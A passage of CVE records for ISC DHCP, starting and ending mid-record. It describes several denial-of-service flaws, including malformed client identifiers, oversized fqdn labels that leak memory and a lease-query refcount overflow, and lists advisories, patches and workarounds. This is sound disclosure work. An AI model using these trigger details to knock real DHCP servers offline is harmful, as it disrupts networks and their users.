          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://kb.isc.org/article/AA-00712"
          },
          {
            "name": "DSA-2516",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2012/dsa-2516"
          },
          {
            "name": "RHSA-2012:1141",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "http://rhn.redhat.com/errata/RHSA-2012-1141.html"
          },
          {
            "name": "MDVSA-2012:116",
            "tags": [
              "vendor-advisory",
              "x_refsource_MANDRIVA",
              "x_transferred"
            ],
            "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:116"
          },
          {
            "name": "openSUSE-SU-2012:1006",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://lists.opensuse.org/opensuse-updates/2012-08/msg00030.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10761"
          },
          {
            "name": "MDVSA-2012:115",
            "tags": [
              "vendor-advisory",
              "x_refsource_MANDRIVA",
              "x_transferred"
            ],
            "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:115"
          },
          {
            "name": "DSA-2519",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2012/dsa-2519"
          },
          {
            "name": "USN-1519-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "http://www.ubuntu.com/usn/USN-1519-1"
          },
          {
            "name": "GLSA-201301-06",
            "tags": [
              "vendor-advisory",
              "x_refsource_GENTOO",
              "x_transferred"
            ],
            "url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
          },
          {
            "name": "RHSA-2012:1140",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "http://rhn.redhat.com/errata/RHSA-2012-1140.html"
          },
          {
            "name": "54665",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/54665"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2012-07-24T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "ISC DHCP 4.1.2 through 4.2.4 and 4.1-ESV before 4.1-ESV-R6 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a malformed client identifier."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2016-12-29T21:57:01.000Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://kb.isc.org/article/AA-00712"
        },
        {
          "name": "DSA-2516",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2012/dsa-2516"
        },
        {
          "name": "RHSA-2012:1141",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "http://rhn.redhat.com/errata/RHSA-2012-1141.html"
        },
        {
          "name": "MDVSA-2012:116",
          "tags": [
            "vendor-advisory",
            "x_refsource_MANDRIVA"
          ],
          "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:116"
        },
        {
          "name": "openSUSE-SU-2012:1006",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://lists.opensuse.org/opensuse-updates/2012-08/msg00030.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10761"
        },
        {
          "name": "MDVSA-2012:115",
          "tags": [
            "vendor-advisory",
            "x_refsource_MANDRIVA"
          ],
          "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:115"
        },
        {
          "name": "DSA-2519",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2012/dsa-2519"
        },
        {
          "name": "USN-1519-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "http://www.ubuntu.com/usn/USN-1519-1"
        },
        {
          "name": "GLSA-201301-06",
          "tags": [
            "vendor-advisory",
            "x_refsource_GENTOO"
          ],
          "url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
        },
        {
          "name": "RHSA-2012:1140",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "http://rhn.redhat.com/errata/RHSA-2012-1140.html"
        },
        {
          "name": "54665",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/54665"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2012-3571",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "ISC DHCP 4.1.2 through 4.2.4 and 4.1-ESV before 4.1-ESV-R6 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a malformed client identifier."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html",
              "refsource": "CONFIRM",
              "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html"
            },
            {
              "name": "https://kb.isc.org/article/AA-00712",
              "refsource": "CONFIRM",
              "url": "https://kb.isc.org/article/AA-00712"
            },
            {
              "name": "DSA-2516",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2012/dsa-2516"
            },
            {
              "name": "RHSA-2012:1141",
              "refsource": "REDHAT",
              "url": "http://rhn.redhat.com/errata/RHSA-2012-1141.html"
            },
            {
              "name": "MDVSA-2012:116",
              "refsource": "MANDRIVA",
              "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:116"
            },
            {
              "name": "openSUSE-SU-2012:1006",
              "refsource": "SUSE",
              "url": "http://lists.opensuse.org/opensuse-updates/2012-08/msg00030.html"
            },
            {
              "name": "http://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10761",
              "refsource": "CONFIRM",
              "url": "http://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10761"
            },
            {
              "name": "MDVSA-2012:115",
              "refsource": "MANDRIVA",
              "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:115"
            },
            {
              "name": "DSA-2519",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2012/dsa-2519"
            },
            {
              "name": "USN-1519-1",
              "refsource": "UBUNTU",
              "url": "http://www.ubuntu.com/usn/USN-1519-1"
            },
            {
              "name": "GLSA-201301-06",
              "refsource": "GENTOO",
              "url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
            },
            {
              "name": "RHSA-2012:1140",
              "refsource": "REDHAT",
              "url": "http://rhn.redhat.com/errata/RHSA-2012-1140.html"
            },
            {
              "name": "54665",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/54665"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2012-3571",
    "datePublished": "2012-07-25T10:00:00.000Z",
    "dateReserved": "2012-06-14T00:00:00.000Z",
    "dateUpdated": "2024-08-06T20:13:51.326Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2012-3570 (GCVE-0-2012-3570)

Vulnerability from nvd – Published: 2012-07-25 10:00 – Updated: 2024-08-06 20:13
Summary
Buffer overflow in ISC DHCP 4.2.x before 4.2.4-P1, when DHCPv6 mode is enabled, allows remote attackers to cause a denial of service (segmentation fault and daemon exit) via a crafted client identifier parameter.
Severity
No CVSS data available.
CWE
  • n/a
Assigner
References
http://lists.opensuse.org/opensuse-updates/2012-0… vendor-advisory x_refsource_SUSE
http://www.mandriva.com/security/advisories?name=… vendor-advisory x_refsource_MANDRIVA
http://security.gentoo.org/glsa/glsa-201301-06.xml vendor-advisory x_refsource_GENTOO
https://kb.isc.org/article/AA-00714 x_refsource_CONFIRM
http://www.securityfocus.com/bid/54665 vdb-entry x_refsource_BID
Date Public
2012-07-24 00:00

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T20:13:50.567Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "openSUSE-SU-2012:1006",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://lists.opensuse.org/opensuse-updates/2012-08/msg00030.html"
          },
          {
            "name": "MDVSA-2012:115",
            "tags": [
              "vendor-advisory",
              "x_refsource_MANDRIVA",
              "x_transferred"
            ],
            "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:115"
          },
          {
            "name": "GLSA-201301-06",
            "tags": [
              "vendor-advisory",
              "x_refsource_GENTOO",
              "x_transferred"
            ],
            "url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://kb.isc.org/article/AA-00714"
          },
          {
            "name": "54665",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/54665"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2012-07-24T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "Buffer overflow in ISC DHCP 4.2.x before 4.2.4-P1, when DHCPv6 mode is enabled, allows remote attackers to cause a denial of service (segmentation fault and daemon exit) via a crafted client identifier parameter."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2016-11-25T19:57:01.000Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "openSUSE-SU-2012:1006",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://lists.opensuse.org/opensuse-updates/2012-08/msg00030.html"
        },
        {
          "name": "MDVSA-2012:115",
          "tags": [
            "vendor-advisory",
            "x_refsource_MANDRIVA"
          ],
          "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:115"
        },
        {
          "name": "GLSA-201301-06",
          "tags": [
            "vendor-advisory",
            "x_refsource_GENTOO"
          ],
          "url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://kb.isc.org/article/AA-00714"
        },
        {
          "name": "54665",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/54665"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2012-3570",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Buffer overflow in ISC DHCP 4.2.x before 4.2.4-P1, when DHCPv6 mode is enabled, allows remote attackers to cause a denial of service (segmentation fault and daemon exit) via a crafted client identifier parameter."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "openSUSE-SU-2012:1006",
              "refsource": "SUSE",
              "url": "http://lists.opensuse.org/opensuse-updates/2012-08/msg00030.html"
            },
            {
              "name": "MDVSA-2012:115",
              "refsource": "MANDRIVA",
              "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:115"
            },
            {
              "name": "GLSA-201301-06",
              "refsource": "GENTOO",
              "url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
            },
            {
              "name": "https://kb.isc.org/article/AA-00714",
              "refsource": "CONFIRM",
              "url": "https://kb.isc.org/article/AA-00714"
            },
            {
              "name": "54665",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/54665"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2012-3570",
    "datePublished": "2012-07-25T10:00:00.000Z",
    "dateReserved": "2012-06-14T00:00:00.000Z",
    "dateUpdated": "2024-08-06T20:13:50.567Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2011-4868 (GCVE-0-2011-4868)

Vulnerability from nvd – Published: 2012-01-15 02:00 – Updated: 2024-08-07 00:16
Summary
The logging functionality in dhcpd in ISC DHCP before 4.2.3-P2, when using Dynamic DNS (DDNS) and issuing IPv6 addresses, does not properly handle the DHCPv6 lease structure, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via crafted packets related to a lease-status update.
Severity
No CVSS data available.
CWE
  • n/a
Assigner
Date Public
2012-01-12 00:00

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T00:16:35.122Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://kb.isc.org/article/AA-00705"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://www.isc.org/software/dhcp/advisories/cve-2011-4868"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://deepthought.isc.org/article/AA-00595"
          },
          {
            "name": "GLSA-201301-06",
            "tags": [
              "vendor-advisory",
              "x_refsource_GENTOO",
              "x_transferred"
            ],
            "url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2012-01-12T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "The logging functionality in dhcpd in ISC DHCP before 4.2.3-P2, when using Dynamic DNS (DDNS) and issuing IPv6 addresses, does not properly handle the DHCPv6 lease structure, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via crafted packets related to a lease-status update."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2016-11-30T20:57:01.000Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://kb.isc.org/article/AA-00705"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://www.isc.org/software/dhcp/advisories/cve-2011-4868"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://deepthought.isc.org/article/AA-00595"
        },
        {
          "name": "GLSA-201301-06",
          "tags": [
            "vendor-advisory",
            "x_refsource_GENTOO"
          ],
          "url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2011-4868",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The logging functionality in dhcpd in ISC DHCP before 4.2.3-P2, when using Dynamic DNS (DDNS) and issuing IPv6 addresses, does not properly handle the DHCPv6 lease structure, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via crafted packets related to a lease-status update."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://kb.isc.org/article/AA-00705",
              "refsource": "CONFIRM",
              "url": "https://kb.isc.org/article/AA-00705"
            },
            {
              "name": "https://www.isc.org/software/dhcp/advisories/cve-2011-4868",
              "refsource": "CONFIRM",
              "url": "https://www.isc.org/software/dhcp/advisories/cve-2011-4868"
            },
            {
              "name": "https://deepthought.isc.org/article/AA-00595",
              "refsource": "CONFIRM",
              "url": "https://deepthought.isc.org/article/AA-00595"
            },
            {
              "name": "GLSA-201301-06",
              "refsource": "GENTOO",
              "url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2011-4868",
    "datePublished": "2012-01-15T02:00:00.000Z",
    "dateReserved": "2011-12-19T00:00:00.000Z",
    "dateUpdated": "2024-08-07T00:16:35.122Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-2929 (GCVE-0-2022-2929)

Vulnerability from cvelistv5 – Published: 2022-10-07 04:45 – Updated: 2024-09-16 18:28
Title
DHCP memory leak
Summary
In ISC DHCP 1.0 -> 4.4.3, ISC DHCP 4.1-ESV-R1 -> 4.1-ESV-R16-P1 a system with access to a DHCP server, sending DHCP packets crafted to include fqdn labels longer than 63 bytes, could eventually cause the server to run out of memory.
CWE
  • The function fqdn_universe_decode() allocates buffer space for the contents of option 81 (fqdn) data received in a DHCP packet. The maximum length of a DNS label is 63 bytes. The function tests the length byte of each label contained in the fqdn; if it finds a label whose length byte value is larger than 63, it returns without dereferencing the buffer space. This will cause a memory leak. Affects In ISC DHCP 1.0 -> 4.4.3, ISC DHCP 4.1-ESV-R1 -> 4.1-ESV-R16-P1
Assigner
isc
Impacted products
Vendor: ISC
Product: ISC DHCP
Version:
  • Affected: 1.0 through versions before 4.1-ESV-R16-P2
  • Affected: 4.2 through versions before 4.4.3.-P1
Date Public
2022-10-05 00:00
Credits
ISC would like to thank VictorV of Cyber Kunlun Lab for discovering and reporting this issue.

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T00:52:59.819Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://kb.isc.org/docs/cve-2022-2929"
          },
          {
            "name": "[debian-lts-announce] 20221010 [SECURITY] [DLA 3146-1] isc-dhcp security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00015.html"
          },
          {
            "name": "FEDORA-2022-f5a45757df",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QQXYCIWUDILRCNBAIMVFCSGXBRKEPB4K/"
          },
          {
            "name": "FEDORA-2022-9ca9a94e28",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T6IBFH4MRRNJQVWEKILQ6I6CXWW766FX/"
          },
          {
            "name": "FEDORA-2022-c4f274a54f",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2SARIK7KZ7MGQIWDRWZFAOSQSPXY4GOU/"
          },
          {
            "name": "GLSA-202305-22",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://security.gentoo.org/glsa/202305-22"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "ISC DHCP",
          "vendor": "ISC",
          "versions": [
            {
              "status": "affected",
              "version": "1.0 through versions before 4.1-ESV-R16-P2"
            },
            {
              "status": "affected",
              "version": "4.2 through versions before 4.4.3.-P1"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "ISC would like to thank VictorV of Cyber Kunlun Lab for discovering and reporting this issue."
        }
      ],
      "datePublic": "2022-10-05T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "In ISC DHCP 1.0 -\u003e 4.4.3, ISC DHCP 4.1-ESV-R1 -\u003e 4.1-ESV-R16-P1 a system with access to a DHCP server, sending DHCP packets crafted to include fqdn labels longer than 63 bytes, could eventually cause the server to run out of memory."
        }
      ],
      "exploits": [
        {
          "lang": "en",
          "value": "We are not aware of any active exploits."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "The function fqdn_universe_decode() allocates buffer space for the contents of option 81 (fqdn) data received in a DHCP packet. The maximum length of a DNS label is 63 bytes. The function tests the length byte of each label contained in the fqdn; if it finds a label whose length byte value is larger than 63, it returns without dereferencing the buffer space. This will cause a memory leak. Affects In ISC DHCP 1.0 -\u003e 4.4.3, ISC DHCP 4.1-ESV-R1 -\u003e 4.1-ESV-R16-P1",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-05-03T00:00:00.000Z",
        "orgId": "404fd4d2-a609-4245-b543-2c944a302a22",
        "shortName": "isc"
      },
      "references": [
        {
          "url": "https://kb.isc.org/docs/cve-2022-2929"
        },
        {
          "name": "[debian-lts-announce] 20221010 [SECURITY] [DLA 3146-1] isc-dhcp security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00015.html"
        },
        {
          "name": "FEDORA-2022-f5a45757df",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QQXYCIWUDILRCNBAIMVFCSGXBRKEPB4K/"
        },
        {
          "name": "FEDORA-2022-9ca9a94e28",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T6IBFH4MRRNJQVWEKILQ6I6CXWW766FX/"
        },
        {
          "name": "FEDORA-2022-c4f274a54f",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2SARIK7KZ7MGQIWDRWZFAOSQSPXY4GOU/"
        },
        {
          "name": "GLSA-202305-22",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://security.gentoo.org/glsa/202305-22"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "value": "Upgrade to the patched release most closely related to your current version of ISC DHCP. These can all be downloaded from https://www.isc.org/downloads.  4.4.3-P1 4.1-ESV-R16-P2"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "DHCP memory leak",
      "workarounds": [
        {
          "lang": "en",
          "value": "As exploiting this vulnerability requires an attacker to send packets for an extended period of time, restarting servers periodically could be a viable workaround."
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "404fd4d2-a609-4245-b543-2c944a302a22",
    "assignerShortName": "isc",
    "cveId": "CVE-2022-2929",
    "datePublished": "2022-10-07T04:45:12.836Z",
    "dateReserved": "2022-08-22T00:00:00.000Z",
    "dateUpdated": "2024-09-16T18:28:37.665Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-2928 (GCVE-0-2022-2928)

Vulnerability from cvelistv5 – Published: 2022-10-07 04:45 – Updated: 2024-09-17 00:21
Title
An option refcount overflow exists in dhcpd
Summary
In ISC DHCP 4.4.0 -> 4.4.3, ISC DHCP 4.1-ESV-R1 -> 4.1-ESV-R16-P1, when the function option_code_hash_lookup() is called from add_option(), it increases the option's refcount field. However, there is not a corresponding call to option_dereference() to decrement the refcount field. The function add_option() is only used in server responses to lease query packets. Each lease query response calls this function for several options, so eventually, the reference counters could overflow and cause the server to abort.
CWE
  • A DHCP server configured with allow leasequery;, a remote machine with access to the server can send lease queries for the same lease multiple times, leading to the add_option() function being repeatedly called. This could cause an option's refcount field to overflow and the server to abort. Internally, reference counters are integers and thus overflow at 2^31 references, so even at 1000 lease query responses per second, it would take more than three weeks to crash the server. Affects In ISC DHCP 4.4.0 -> 4.4.3, ISC DHCP 4.1-ESV-R1 -> 4.1-ESV-R16-P1
Assigner
isc
Impacted products
Vendor: ISC
Product: ISC DHCP
Version:
  • Affected: 4.4.0 through versions before 4.4.3-P1
  • Affected: 4.1 ESV 4.1-ESV-R1 through versions before 4.1-ESV-R16-P1
Date Public
2022-10-05 00:00
Credits
ISC would like to thank VictorV of Cyber Kunlun Lab for discovering and reporting this issue.

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T00:53:00.326Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://kb.isc.org/docs/cve-2022-2928"
          },
          {
            "name": "[debian-lts-announce] 20221010 [SECURITY] [DLA 3146-1] isc-dhcp security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00015.html"
          },
          {
            "name": "FEDORA-2022-f5a45757df",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QQXYCIWUDILRCNBAIMVFCSGXBRKEPB4K/"
          },
          {
            "name": "FEDORA-2022-9ca9a94e28",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T6IBFH4MRRNJQVWEKILQ6I6CXWW766FX/"
          },
          {
            "name": "FEDORA-2022-c4f274a54f",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2SARIK7KZ7MGQIWDRWZFAOSQSPXY4GOU/"
          },
          {
            "name": "GLSA-202305-22",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://security.gentoo.org/glsa/202305-22"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "ISC DHCP",
          "vendor": "ISC",
          "versions": [
            {
              "status": "affected",
              "version": "4.4.0 through versions before 4.4.3-P1"
            },
            {
              "status": "affected",
              "version": "4.1 ESV 4.1-ESV-R1 through versions before 4.1-ESV-R16-P1"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "ISC would like to thank VictorV of Cyber Kunlun Lab for discovering and reporting this issue."
        }
      ],
      "datePublic": "2022-10-05T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
